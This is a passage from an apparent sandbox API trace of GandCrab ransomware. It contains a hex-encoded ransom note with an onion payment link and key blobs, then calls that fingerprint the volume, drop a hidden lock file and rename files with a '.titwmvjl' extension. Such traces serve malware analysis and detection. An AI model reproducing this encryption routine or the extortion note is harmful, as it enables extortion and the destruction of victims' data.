e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.482] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0072.483] CloseHandle (hObject=0x2d4) returned 1 [0072.483] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.483] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.483] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x319)) [0072.483] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.483] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.484] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.484] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a09d2ca4deb61a.lock") returned 107 [0072.484] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0072.486] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.486] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.486] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 83 [0072.486] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0072.486] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503338 [0072.487] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.487] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.487] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.487] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.487] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.487] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.487] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.487] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a09d2ca4deb61a.lock" [0072.487] lstrlenW (lpString=".titwmvjl") returned 9 [0072.487] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a09d2ca4deb61a.lock") returned 107 [0072.487] VirtualAlloc (lpAddress=0x0, dwSize=0x116, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.488] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 116 [0072.488] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\d2ca4a09d2ca4deb61a.lock") returned 107 [0072.488] lstrlenW (lpString=".lock") returned 5 [0072.488] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.488] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.488] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.488] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.488] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0072.488] lstrcmpW (lpString1="rasphone.pbk", lpString2=".") returned 1 [0072.488] lstrcmpW (lpString1="rasphone.pbk", lpString2="..") returned 1 [0072.488] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="rasphone.pbk" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" [0072.488] lstrlenW (lpString=".titwmvjl") returned 9 [0072.488] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk") returned 95 [0072.488] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, 